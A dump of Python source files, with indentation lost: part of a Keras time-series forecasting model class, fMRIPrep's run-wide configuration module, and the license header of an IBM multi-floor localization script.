model_delta=cfg.model_delta,
interpolate=cfg.interpolate,
model_type=cfg.model_type,
num_epochs=cfg.num_epochs,
epochs_patience=cfg.epochs_patience,
blocks=cfg.blocks,
stacked_blocks=cfg.stacked_blocks,
steps_ahead=cfg.steps_ahead,
batch_size=cfg.batch_size,
batch_normalization=cfg.batch_normalization,
dropout_rate=cfg.dropout_rate
):
multivariate = len(df_train.columns)
self.set_multivariate(multivariate)
if sequence_len is None:
sequence_len = self.get_sequence_len()
else:
self.set_sequence_len(sequence_len)
if model_delta is None:
model_delta = self.is_delta()
else:
self.set_model_delta(model_delta)
if interpolate is None:
interpolate = self.get_interpolate()
else:
self.set_interpolate(interpolate)
if model_type is None:
model_type = self.get_model_type()
else:
self.set_model_type(model_type)
if num_epochs is None:
num_epochs = self.get_epochs()
else:
self.set_epochs(num_epochs)
if epochs_patience is None:
epochs_patience = self.get_epochs_patience()
else:
self.set_epochs_patience(epochs_patience)
if blocks is None:
blocks = self.get_blocks()
else:
self.set_blocks(blocks)
if stacked_blocks is None:
stacked_blocks = self.get_stacked_blocks()
else:
self.set_stacked_blocks(stacked_blocks)
if steps_ahead is None:
steps_ahead = self.get_steps_ahead()
else:
self.set_steps_ahead(steps_ahead)
if batch_size is None:
batch_size = self.get_batch_size()
else:
self.set_batch_size(batch_size)
if batch_normalization is None:
batch_normalization = self.get_batch_normalization()
else:
self.set_batch_normalization(batch_normalization)
if dropout_rate is None:
dropout_rate = self.get_dropout_rate()
else:
self.set_dropout_rate(dropout_rate)
# Define model
h = None
x = Input(shape=(sequence_len, multivariate))
if model_type == 'MLP': # MLP
h = Dense(units=multivariate, activation='relu')(x)
h = Flatten()(h)
elif model_type == 'autoencoderMLP': # autoencoder MLP
nn = [128, 64, 32, 16, 32, 64, 128]
h = Dense(units=nn[0], activation='relu')(x)
for n in nn[1:]:
h = Dense(units=n, activation='relu')(h)
h = Flatten()(h)
elif model_type == 'Conv1D': # CNN
h = Conv1D(filters=64, kernel_size=2, activation='relu')(x)
h = MaxPooling1D(pool_size=2)(h)
h = Flatten()(h)
elif model_type == 'TCN': # https://pypi.org/project/keras-tcn/
h = TCN(return_sequences=False)(x)
elif model_type == 'stackedTCN' and stacked_blocks > 1: # stacked TCN
h = TCN(return_sequences=True)(x)
if stacked_blocks > 2:
for i in range(stacked_blocks - 2):
h = TCN(return_sequences=True)(h)
h = TCN(return_sequences=False)(h)
elif model_type == 'GRU': # GRU
h = GRU(cfg.blocks)(x)
elif model_type == 'LSTM': # LSTM
h = LSTM(cfg.blocks)(x)
elif model_type == 'bidirectLSTM': # bidirectional LSTM
h = Bidirectional(LSTM(cfg.blocks))(x)
elif model_type == 'attentionLSTM': # https://pypi.org/project/keras-self-attention/
h = Bidirectional(LSTM(cfg.blocks, return_sequences=True))(x)
h = SeqSelfAttention(attention_activation='sigmoid')(h)
h = Flatten()(h)
elif model_type == 'seq2seqLSTM':
h = LSTM(cfg.blocks)(x)
h = RepeatVector(sequence_len)(h)
h = LSTM(cfg.blocks)(h)
elif model_type == 'stackedLSTM' and stacked_blocks > 1: # stacked LSTM
h = LSTM(cfg.blocks, return_sequences=True)(x)
if stacked_blocks > 2:
for i in range(stacked_blocks - 2):
h = LSTM(cfg.blocks, return_sequences=True)(h)
h = LSTM(cfg.blocks)(x)
if h is None:
raise Exception('model not specified (h is None)')
y = Dense(units=multivariate, activation='sigmoid')(h) # 'softmax' for multiclass classification
self.model = Model(inputs=x, outputs=y)
# Drawing model
logging.info(self.model.summary())
# Optimizer
opt = Adam(clipnorm=1.0, clipvalue=0.5)
# Compile model
self.model.compile(
loss='mean_squared_error', # Adam
optimizer=opt, # 'adam', 'adagrad', 'rmsprop', opt
metrics=['mse', 'mae']) # 'cosine', 'mape'
# Checkpointing and earlystopping
filepath = os.path.join(cfg.app_checkpoints, self.name + '-{epoch:02d}.hdf5')
checkpoints = ModelCheckpoint(
filepath,
monitor='loss',
save_best_only=True,
mode=max,
verbose=1
)
earlystops = EarlyStopping(
monitor='loss',
patience=epochs_patience,
verbose=1
)
callbacks_list = [checkpoints, earlystops]
# launch tensorboard
if cfg.launch_tensorboard:
logging.info('launching Tensorboard')
subprocess.run(['fuser', '-k', '{}/tcp'.format(cfg.app_tensorboard_port)]) # kill any previous process in that port
p = Process(target=launch_tensorboard, args=(cfg.app_tensorboard_port, cfg.app_tensorboard_logdir), daemon=True)
p.start()
logging.info('Tensorboard PID:%d' % p.pid)
tensorboard = TensorBoard(log_dir=os.path.join(cfg.app_tensorboard_logdir, "{}".format(time.time())))
callbacks_list.append(tensorboard)
logging.info('Tensorboard callback was added to the callback list')
# Replace None by 0
df_train.replace('None', 0, inplace=True)
# Add missing values
if self.get_interpolate():
df_train.interpolate(inplace=True)
# Data transformation
# df_train = df_train.values.astype('float32')
df_train = self.transform(df_train)
df_train = self.normalize(df_train, self.get_scaler())
tsg_train = self.get_tsg(df_train, steps_ahead=steps_ahead, batch_size=batch_size)
if cfg.MODS_DEBUG_MODE:
# TODO:
logging.info(self.config)
start_time = time.time()
self.model.fit_generator(
tsg_train,
epochs=num_epochs,
callbacks=callbacks_list
)
training_time = time.time() - start_time
self.set_training_time(training_time)
logging.info('training time: %s' % training_time)
def plot(self, *args):
logging.info('this method is not yet implemented')
def __init(self):
logging.info('Initializing model')
if self.sample_data is not None:
self.predict(self.sample_data)
logging.info('Model initialized')
# First order differential for numpy array y' = d(y)/d(t) = f(y,t)
# be carefull len(dt) == len(data)-1
# e.g., [5,2,9,1] --> [2-5,9-2,1-9] == [-3,7,-8]
def delta(self, df):
if isinstance(df, pd.DataFrame):
# pandas data frame
return df.diff(periods=1, axis=0)[1:]
# numpy ndarray
return df[1:] - df[:-1]
def transform(self, df):
if self.is_delta():
return self.delta(df)
else:
# bucketing, taxo, fuzzy
return df
def inverse_transform(self, original, pred_denorm):
if self.is_delta():
beg = self.get_sequence_len() - self.get_steps_ahead() + 1
y = original[beg:]
utl.dbg_df(y, self.name, 'y.tsv', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
d = pred_denorm
utl.dbg_df(d, self.name, 'd.tsv', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
return y + d
else:
return pred_denorm
# normalizes data, returns np.ndarray
def normalize(self, df, scaler, fit=True):
# Scale all metrics but each separately
df = scaler.fit_transform(df) if fit else scaler.transform(df)
utl.dbg_scaler(scaler, 'normalize', debug=cfg.MODS_DEBUG_MODE)
return df
# inverse method to @normalize
def inverse_normalize(self, df):
scaler = self.get_scaler()
utl.dbg_scaler(scaler, 'inverse_normalize', debug=cfg.MODS_DEBUG_MODE)
return scaler.inverse_transform(df)
def get_tsg(self, df,
steps_ahead=cfg.steps_ahead,
batch_size=cfg.batch_size
):
x = y = df
length = self.get_sequence_len()
if steps_ahead > 1:
x = df[:-(steps_ahead - 1)]
y = df[steps_ahead - 1:]
return TimeseriesGenerator(
x,
y,
length=length,
sampling_rate=1,
stride=1,
batch_size=batch_size
)
def predict(self, df):
utl.dbg_df(df, self.name, 'original', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
if self.get_interpolate():
df = df.interpolate()
utl.dbg_df(df, self.name, 'interpolated', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
trans = self.transform(df)
utl.dbg_df(trans, self.name, 'transformed', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
norm = self.normalize(trans, self.get_scaler(), fit=False)
utl.dbg_df(norm, self.name, 'normalized', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
# append #steps_ahead dummy rows at the end of the norm
# np.ndarray in order to tsg generate last sample
# for prediction of the future state
dummy = [np.nan] * self.get_multivariate()
for i in range(self.get_steps_ahead()):
norm = np.append(norm, [dummy], axis=0)
utl.dbg_df(norm, self.name, 'normalized+nan', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
tsg = self.get_tsg(norm, steps_ahead=self.get_steps_ahead(), batch_size=self.get_batch_size())
utl.dbg_tsg(tsg, 'norm_tsg', debug=cfg.MODS_DEBUG_MODE)
pred = self.model.predict_generator(tsg)
utl.dbg_df(pred, self.name, 'prediction', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
pred_denorm = self.inverse_normalize(pred)
utl.dbg_df(pred_denorm, self.name, 'pred_denormalized', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
pred_invtrans = self.inverse_transform(df, pred_denorm)
utl.dbg_df(pred_invtrans, self.name, 'pred_inv_trans', print=cfg.MODS_DEBUG_MODE, save=cfg.MODS_DEBUG_MODE)
if isinstance(pred_invtrans, pd.DataFrame):
pred_invtrans = pred_invtrans.values
return pred_invtrans
# This function wraps pandas._read_csv() and reads the csv data
def read_file_or_buffer(self, *args, **kwargs):
try:
fill_missing_rows_in_timeseries = kwargs['fill_missing_rows_in_timeseries']
except Exception:
fill_missing_rows_in_timeseries = False
if kwargs is not None:
kwargs = {k: v for k, v in kwargs.items() if k in [
'usecols', 'sep', 'skiprows', 'skipfooter', 'engine', 'header'
]}
if 'usecols' in kwargs:
if isinstance(kwargs['usecols'], str):
kwargs['usecols'] = [
utl.parse_int_or_str(col)
for col in kwargs['usecols'].split(',')
]
if 'header' in kwargs:
if isinstance(kwargs['header'], str):
kwargs['header'] = [
utl.parse_int_or_str(col)
for col in kwargs['header'].split(',')
]
if len(kwargs['header']) == 1:
kwargs['header'] = kwargs['header'][0]
df = pd.read_csv(*args, **kwargs)
if fill_missing_rows_in_timeseries is True:
df = utl.fill_missing_rows(df)
return df
def eval(self, df):
interpol = df
if self.get_interpolate():
interpol = df.interpolate()
interpol = interpol.values.astype('float32')
# logging.info('interpolated:\n%s' % interpol)
trans = self.transform(interpol)
# logging.info('transformed:\n%s' % transf)
norm = self.normalize(trans, self.get_scaler())
# logging.info('normalized:\n%s' % norm)
tsg = self.get_tsg(norm, self.get_steps_ahead(), cfg.batch_size_test)
return self.model.evaluate_generator(tsg)
|
config.py
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# Copyright 2021 The NiPreps Developers <nipreps@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# We support and encourage derived works from this project, please read
# about our expectations at
#
# https://www.nipreps.org/community/licensing/
#
r"""
A Python module to maintain unique, run-wide *fMRIPrep* settings.
This module implements the memory structures to keep a consistent, singleton config.
Settings are passed across processes via filesystem, and a copy of the settings for
each run and subject is left under
``<fmriprep_dir>/sub-<participant_id>/log/<run_unique_id>/fmriprep.toml``.
Settings are stored using :abbr:`ToML (Tom's Markup Language)`.
The module has a :py:func:`~fmriprep.config.to_filename` function to allow writting out
the settings to hard disk in *ToML* format, which looks like:
.. literalinclude:: ../fmriprep/data/tests/config.toml
:language: toml
:name: fmriprep.toml
:caption: **Example file representation of fMRIPrep settings**.
This config file is used to pass the settings across processes,
using the :py:func:`~fmriprep.config.load` function.
Configuration sections
----------------------
.. autoclass:: environment
:members:
.. autoclass:: execution
:members:
.. autoclass:: workflow
:members:
.. autoclass:: nipype
:members:
Usage
-----
A config file is used to pass settings and collect information as the execution
graph is built across processes.
.. code-block:: Python
from fmriprep import config
config_file = config.execution.work_dir / '.fmriprep.toml'
config.to_filename(config_file)
# Call build_workflow(config_file, retval) in a subprocess
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
config.load(config_file)
# Access configs from any code section as:
value = config.section.setting
Logging
-------
.. autoclass:: loggers
:members:
Other responsibilities
----------------------
The :py:mod:`config` is responsible for other conveniency actions.
* Switching Python's :obj:`multiprocessing` to *forkserver* mode.
* Set up a filter for warnings as early as possible.
* Automated I/O magic operations. Some conversions need to happen in the
store/load processes (e.g., from/to :obj:`~pathlib.Path` \<-\> :obj:`str`,
:py:class:`~bids.layout.BIDSLayout`, etc.)
"""
import os
from multiprocessing import set_start_method
# Disable NiPype etelemetry always
_disable_et = bool(
os.getenv("NO_ET") is not None or os.getenv("NIPYPE_NO_ET") is not None
)
os.environ["NIPYPE_NO_ET"] = "1"
os.environ["NO_ET"] = "1"
CONFIG_FILENAME = "fmriprep.toml"
try:
set_start_method("forkserver")
except RuntimeError:
pass # context has been already set
finally:
# Defer all custom import for after initializing the forkserver and
# ignoring the most annoying warnings
import sys
import random
from uuid import uuid4
from time import strftime
from pathlib import Path
from nipype import __version__ as _nipype_ver
from templateflow import __version__ as _tf_ver
from . import __version__
if not hasattr(sys, "_is_pytest_session"):
sys._is_pytest_session = False # Trick to avoid sklearn's FutureWarnings
# Disable all warnings in main and children processes only on production versions
if not any(
(
"+" in __version__,
__version__.endswith(".dirty"),
os.getenv("FMRIPREP_DEV", "0").lower() in ("1", "on", "true", "y", "yes"),
)
):
from ._warnings import logging
os.environ["PYTHONWARNINGS"] = "ignore"
elif os.getenv("FMRIPREP_WARNINGS", "0").lower() in ("1", "on", "true", "y", "yes"):
# allow disabling warnings on development versions
# https://github.com/nipreps/fmriprep/pull/2080#discussion_r409118765
from ._warnings import logging
else:
import logging
logging.addLevelName(25, "IMPORTANT") # Add a new level between INFO and WARNING
logging.addLevelName(15, "VERBOSE") # Add a new level between INFO and DEBUG
DEFAULT_MEMORY_MIN_GB = 0.01
# Ping NiPype eTelemetry once if env var was not set
# workers on the pool will have the env variable set from the master process
if not _disable_et:
# Just get so analytics track one hit
from contextlib import suppress
from requests import get as _get_url, ConnectionError, ReadTimeout
with suppress((ConnectionError, ReadTimeout)):
_get_url("https://rig.mit.edu/et/projects/nipy/nipype", timeout=0.05)
# Execution environment
_exec_env = os.name
_docker_ver = None
# special variable set in the container
if os.getenv("IS_DOCKER_8395080871"):
_exec_env = "singularity"
_cgroup = Path("/proc/1/cgroup")
if _cgroup.exists() and "docker" in _cgroup.read_text():
_docker_ver = os.getenv("DOCKER_VERSION_8395080871")
_exec_env = "fmriprep-docker" if _docker_ver else "docker"
del _cgroup
_fs_license = os.getenv("FS_LICENSE")
if not _fs_license and os.getenv("FREESURFER_HOME"):
_fs_home = os.getenv("FREESURFER_HOME")
if _fs_home and (Path(_fs_home) / "license.txt").is_file():
_fs_license = str(Path(_fs_home) / "license.txt")
del _fs_home
_templateflow_home = Path(
os.getenv(
"TEMPLATEFLOW_HOME", os.path.join(os.getenv("HOME"), ".cache", "templateflow")
)
)
try:
from psutil import virtual_memory
_free_mem_at_start = round(virtual_memory().free / 1024 ** 3, 1)
except Exception:
_free_mem_at_start = None
_oc_limit = "n/a"
_oc_policy = "n/a"
try:
# Memory policy may have a large effect on types of errors experienced
_proc_oc_path = Path("/proc/sys/vm/overcommit_memory")
if _proc_oc_path.exists():
_oc_policy = {"0": "heuristic", "1": "always", "2": "never"}.get(
_proc_oc_path.read_text().strip(), "unknown"
)
if _oc_policy != "never":
_proc_oc_kbytes = Path("/proc/sys/vm/overcommit_kbytes")
if _proc_oc_kbytes.exists():
_oc_limit = _proc_oc_kbytes.read_text().strip()
if (
_oc_limit in ("0", "n/a")
and Path("/proc/sys/vm/overcommit_ratio").exists()
):
_oc_limit = "{}%".format(
Path("/proc/sys/vm/overcommit_ratio").read_text().strip()
)
except Exception:
pass
# Debug modes are names that influence the exposure of internal details to
# the user, either through additional derivatives or increased verbosity
DEBUG_MODES = ("compcor",)
class _Config:
"""An abstract class forbidding instantiation."""
_paths = tuple()
def __init__(self):
"""Avert instantiation."""
raise RuntimeError("Configuration type is not instantiable.")
@classmethod
def load(cls, settings, init=True, ignore=None):
"""Store settings from a dictionary."""
ignore = ignore or {}
for k, v in settings.items():
if k in ignore or v is None:
continue
if k in cls._paths:
setattr(cls, k, Path(v).absolute())
elif hasattr(cls, k):
setattr(cls, k, v)
if init:
try:
cls.init()
except AttributeError:
pass
@classmethod
def get(cls):
"""Return defined settings."""
from niworkflows.utils.spaces import SpatialReferences, Reference
out = {}
for k, v in cls.__dict__.items():
if k.startswith("_") or v is None:
continue
if callable(getattr(cls, k)):
continue
if k in cls._paths:
v = str(v)
if isinstance(v, SpatialReferences):
v = " ".join([str(s) for s in v.references]) or None
if isinstance(v, Reference):
v = str(v) or None
out[k] = v
return out
class environment(_Config):
"""
Read-only options regarding the platform and environment.
Crawls runtime descriptive settings (e.g., default FreeSurfer license,
execution environment, nipype and *fMRIPrep* versions, etc.).
The ``environment`` section is not loaded in from file,
only written out when settings are exported.
This config section is useful when reporting issues,
and these variables are tracked whenever the user does not
opt-out using the ``--notrack`` argument.
"""
cpu_count = os.cpu_count()
"""Number of available CPUs."""
exec_docker_version = _docker_ver
"""Version of Docker Engine."""
exec_env = _exec_env
"""A string representing the execution platform."""
free_mem = _free_mem_at_start
"""Free memory at start."""
overcommit_policy = _oc_policy
"""Linux's kernel virtual memory overcommit policy."""
overcommit_limit = _oc_limit
"""Linux's kernel virtual memory overcommit limits."""
nipype_version = _nipype_ver
"""Nipype's current version."""
templateflow_version = _tf_ver
"""The TemplateFlow client version installed."""
version = __version__
"""*fMRIPrep*'s version."""
class nipype(_Config):
"""Nipype settings."""
crashfile_format = "txt"
"""The file format for crashfiles, either text or pickle."""
get_linked_libs = False
"""Run NiPype's tool to enlist linked libraries for every interface."""
memory_gb = None
"""Estimation in GB of the RAM this workflow can allocate at any given time."""
nprocs = os.cpu_count()
"""Number of processes (compute tasks) that can be run in parallel (multiprocessing only)."""
omp_nthreads = None
"""Number of CPUs a single process can access for multithreaded execution."""
plugin = "MultiProc"
"""NiPype's execution plugin."""
plugin_args = {
"maxtasksperchild": 1,
"raise_insufficient": False,
}
"""Settings for NiPype's execution plugin."""
resource_monitor = False
"""Enable resource monitor."""
stop_on_first_crash = True
"""Whether the workflow should stop or continue after the first error."""
@classmethod
def get_plugin(cls):
"""Format a dictionary for Nipype consumption."""
out = {
"plugin": cls.plugin,
"plugin_args": cls.plugin_args,
}
if cls.plugin in ("MultiProc", "LegacyMultiProc"):
out["plugin_args"]["n_procs"] = int(cls.nprocs)
if cls.memory_gb:
out["plugin_args"]["memory_gb"] = float(cls.memory_gb)
return out
@classmethod
def init(cls):
"""Set NiPype configurations."""
from nipype import config as ncfg
# Configure resource_monitor
if cls.resource_monitor:
ncfg.update_config(
{
"monitoring": {
"enabled": cls.resource_monitor,
"sample_frequency": "0.5",
"summary_append": True,
}
}
)
ncfg.enable_resource_monitor()
# Nipype config (logs and execution)
ncfg.update_config(
{
"execution": {
"crashdump_dir": str(execution.log_dir),
"crashfile_format": cls.crashfile_format,
"get_linked_libs": cls.get_linked_libs,
"stop_on_first_crash": cls.stop_on_first_crash,
"check_version": False, # disable future telemetry
}
}
)
if cls.omp_nthreads is None:
cls.omp_nthreads = min(
cls.nprocs - 1 if cls.nprocs > 1 else os.cpu_count(), 8
)
class execution(_Config):
"""Configure run-level settings."""
anat_derivatives = None
"""A path where anatomical derivatives are found to fast-track *sMRIPrep*."""
bids_dir = None
"""An existing path to the dataset, which must be BIDS-compliant."""
bids_database_dir = None
"""Path to the directory containing SQLite database indices for the input BIDS dataset."""
bids_description_hash = None
"""Checksum (SHA256) of the ``dataset_description.json`` of the BIDS dataset."""
bids_filters = None
"""A dictionary of BIDS selection filters."""
boilerplate_only = False
"""Only generate a boilerplate."""
sloppy = False
"""Run in sloppy mode (meaning, suboptimal parameters that minimize run-time)."""
debug = []
"""Debug mode(s)."""
echo_idx = None
"""Select a particular echo for multi-echo EPI datasets."""
fmriprep_dir = None
"""Root of fMRIPrep BIDS Derivatives dataset. Depends on output_layout."""
fs_license_file = _fs_license
"""An existing file containing a FreeSurfer license."""
fs_subjects_dir = None
"""FreeSurfer's subjects directory."""
layout = None
"""A :py:class:`~bids.layout.BIDSLayout` object, see :py:func:`init`."""
log_dir = None
"""The path to a directory that contains execution logs."""
log_level = 25
"""Output verbosity."""
low_mem = None
"""Utilize uncompressed NIfTIs and other tricks to minimize memory allocation."""
md_only_boilerplate = False
"""Do not convert boilerplate from MarkDown to LaTex and HTML."""
notrack = False
"""Do not monitor *fMRIPrep* using Sentry.io."""
output_dir = None
"""Folder where derivatives will be stored."""
output_layout = None
"""Layout of derivatives within output_dir."""
output_spaces = None
"""List of (non)standard spaces designated (with the ``--output-spaces`` flag of
the command line) as spatial references for outputs."""
reports_only = False
"""Only build the reports, based on the reportlets found in a cached working directory."""
run_uuid = f"{strftime('%Y%m%d-%H%M%S')}_{uuid4()}"
"""Unique identifier of this particular run."""
participant_label = None
"""List of participant identifiers that are to be preprocessed."""
task_id = None
"""Select a particular task from all available in the dataset."""
templateflow_home = _templateflow_home
"""The root folder of the TemplateFlow client."""
work_dir = Path("work").absolute()
"""Path to a working directory where intermediate results will be available."""
write_graph = False
"""Write out the computational graph corresponding to the planned preprocessing."""
_layout = None
_paths = (
"anat_derivatives",
"bids_dir",
"bids_database_dir",
"fmriprep_dir",
"fs_license_file",
"fs_subjects_dir",
"layout",
"log_dir",
"output_dir",
"templateflow_home",
"work_dir",
)
@classmethod
def init(cls):
"""Create a new BIDS Layout accessible with :attr:`~execution.layout`."""
if cls.fs_license_file and Path(cls.fs_license_file).is_file():
os.environ["FS_LICENSE"] = str(cls.fs_license_file)
if cls._layout is None:
import re
from bids.layout import BIDSLayout
_db_path = cls.bids_database_dir or (
cls.work_dir / cls.run_uuid / "bids_db"
)
_db_path.mkdir(exist_ok=True, parents=True)
cls._layout = BIDSLayout(
str(cls.bids_dir),
validate=False,
database_path=_db_path,
reset_database=cls.bids_database_dir is None,
ignore=(
"code",
"stimuli",
"sourcedata",
"models",
re.compile(r"^\."),
),
)
cls.bids_database_dir = _db_path
cls.layout = cls._layout
if cls.bids_filters:
from bids.layout import Query
# unserialize pybids Query enum values
for acq, filters in cls.bids_filters.items():
cls.bids_filters[acq] = {
k: getattr(Query, v[7:-4])
if not isinstance(v, Query) and "Query" in v
else v
for k, v in filters.items()
}
if "all" in cls.debug:
cls.debug = list(DEBUG_MODES)
# These variables are not necessary anymore
del _fs_license
del _exec_env
del _nipype_ver
del _templateflow_home
del _tf_ver
del _free_mem_at_start
del _oc_limit
del _oc_policy
class workflow(_Config):
"""Configure the particular execution graph of this workflow."""
anat_only = False
"""Execute the anatomical preprocessing only."""
aroma_err_on_warn = None
"""Cast AROMA warnings to errors."""
aroma_melodic_dim = None
"""Number of ICA components to be estimated by MELODIC
(positive = exact, negative = maximum)."""
bold2t1w_dof = None
"""Degrees of freedom of the BOLD-to-T1w registration steps."""
bold2t1w_init = "register"
"""Whether to use standard coregistration ('register') or to initialize coregistration from the
BOLD image-header ('header')."""
cifti_output = None
"""Generate HCP Grayordinates, accepts either ``'91k'`` (default) or ``'170k'``."""
dummy_scans = None
"""Set a number of initial scans to be considered nonsteady states."""
fmap_bspline = None
"""Regularize fieldmaps with a field of B-Spline basis."""
fmap_demean = None
"""Remove the mean from fieldmaps."""
force_syn = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation."""
hires = None
"""Run FreeSurfer ``recon-all`` with the ``-hires`` flag."""
ignore = None
"""Ignore particular steps for *fMRIPrep*."""
longitudinal = False
"""Run FreeSurfer ``recon-all`` with the ``-logitudinal`` flag."""
medial_surface_nan = None
"""Fill medial surface with :abbr:`NaNs (not-a-number)` when sampling."""
regressors_all_comps = None
"""Return all CompCor components."""
regressors_dvars_th = None
"""Threshold for DVARS."""
regressors_fd_th = None
"""Threshold for :abbr:`FD (frame-wise displacement)`."""
run_reconall = True
"""Run FreeSurfer's surface reconstruction."""
skull_strip_fixed_seed = False
"""Fix a seed for skull-stripping."""
skull_strip_template = "OASIS30ANTs"
"""Change default brain extraction template."""
skull_strip_t1w = "force"
"""Skip brain extraction of the T1w image (default is ``force``, meaning that
*fMRIPrep* will run brain extraction of the T1w)."""
spaces = None
"""Keeps the :py:class:`~niworkflows.utils.spaces.SpatialReferences`
instance keeping standard and nonstandard spaces."""
use_aroma = None
"""Run ICA-:abbr:`AROMA (automatic removal of motion artifacts)`."""
use_bbr = None
"""Run boundary-based registration for BOLD-to-T1w registration."""
use_syn_sdc = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation
in the absence of any alternatives."""
class loggers:
"""Keep loggers easily accessible (see :py:func:`init`)."""
_fmt = "%(asctime)s,%(msecs)d %(name)-2s " "%(levelname)-2s:\n\t %(message)s"
_datefmt = "%y%m%d-%H:%M:%S"
default = logging.getLogger()
"""The root logger."""
cli = logging.getLogger("cli")
"""Command-line interface logging."""
workflow = logging.getLogger("nipype.workflow")
"""NiPype's workflow logger."""
interface = logging.getLogger("nipype.interface")
"""NiPype's interface logger."""
utils = logging.getLogger("nipype.utils")
"""NiPype's utils logger."""
@classmethod
def init(cls):
"""
Set the log level, initialize all loggers into :py:class:`loggers`.
* Add new logger levels (25: IMPORTANT, and 15: VERBOSE).
* Add a new sub-logger (``cli``).
* Logger configuration.
"""
from nipype import config as ncfg
_handler = logging.StreamHandler(stream=sys.stdout)
_handler.setFormatter(logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt))
cls.cli.addHandler(_handler)
cls.default.setLevel(execution.log_level)
cls.cli.setLevel(execution.log_level)
cls.interface.setLevel(execution.log_level)
cls.workflow.setLevel(execution.log_level)
cls.utils.setLevel(execution.log_level)
ncfg.update_config(
{"logging": {"log_directory": str(execution.log_dir), "log_to_file": True}}
)
class seeds(_Config):
"""Initialize the PRNG and track random seed assignments"""
_random_seed = None
master = None
"""Master random seed to initialize the Pseudorandom Number Generator (PRNG)"""
ants = None
"""Seed used for antsRegistration, antsAI, antsMotionCorr"""
numpy = None
"""Seed used by NumPy"""
@classmethod
def init(cls):
if cls._random_seed is not None:
cls.master = cls._random_seed
if cls.master is None:
cls.master = random.randint(1, 65536)
random.seed(cls.master) # initialize the PRNG
# functions to set program specific seeds
cls.ants = _set_ants_seed()
cls.numpy = _set_numpy_seed()
def _set_ants_seed():
"""Fix random seed for antsRegistration, antsAI, antsMotionCorr"""
val = random.randint(1, 65536)
os.environ["ANTS_RANDOM_SEED"] = str(val)
return val
def _set_numpy_seed():
"""NumPy's random seed is independant from Python's `random` module"""
import numpy as np
val = random.randint(1, 65536)
np.random.seed(val)
return val
def from_dict(settings):
"""Read settings from a flat dictionary."""
nipype.load(settings)
execution.load(settings)
workflow.load(settings)
seeds.load(settings)
loggers.init()
def load(filename, skip=None):
"""Load settings from file."""
from toml import loads
skip = skip or {}
filename = Path(filename)
settings = loads(filename.read_text())
for sectionname, configs in settings.items():
if sectionname != "environment":
section = getattr(sys.modules[__name__], sectionname)
ignore = skip.get(sectionname)
section.load(configs, ignore=ignore)
init_spaces()
def get(flat=False):
"""Get config as a dict."""
settings = {
"environment": environment.get(),
"execution": execution.get(),
"workflow": workflow.get(),
"nipype": nipype.get(),
"seeds": seeds.get(),
}
if not flat:
return settings
return {
".".join((section, k)): v
for section, configs in settings.items()
for k, v in configs.items()
}
def dumps():
"""Format config into toml."""
from toml import dumps
return dumps(get())
def to_filename(filename):
"""Write settings to file."""
filename = Path(filename)
filename.write_text(dumps())
def init_spaces(checkpoint=True):
"""Initialize the :attr:`~workflow.spaces` setting."""
from niworkflows.utils.spaces import Reference, SpatialReferences
spaces = execution.output_spaces or SpatialReferences()
if not isinstance(spaces, SpatialReferences):
spaces = SpatialReferences(
[ref for s in spaces.split(" ") for ref in Reference.from_string(s)]
)
if checkpoint and not spaces.is_cached():
spaces.checkpoint()
# Add the default standard space if not already present (required by several sub-workflows)
if "MNI152NLin2009cAsym" not in spaces.get_spaces(nonstandard=False, dim=(3,)):
spaces.add(Reference("MNI152NLin2009cAsym", {}))
# Ensure user-defined spatial references for outputs are correctly parsed.
# Certain options require normalization to a space not explicitly defined by users.
# These spaces will not be included in the final outputs.
if workflow.use_aroma:
# Make sure there's a normalization to FSL for AROMA to use.
spaces.add(Reference("MNI152NLin6Asym", {"res": "2"}))
cifti_output = workflow.cifti_output
if cifti_output:
# CIFTI grayordinates to corresponding FSL-MNI resolutions.
vol_res = "2" if cifti_output == "91k" else "1"
spaces.add(Reference("fsaverage", {"den": "164k"}))
spaces.add(Reference("MNI152NLin6Asym", {"res": vol_res}))
# Make the SpatialReferences object available
workflow.spaces = spaces
|
multi_floor_manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2021 IBM Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import json
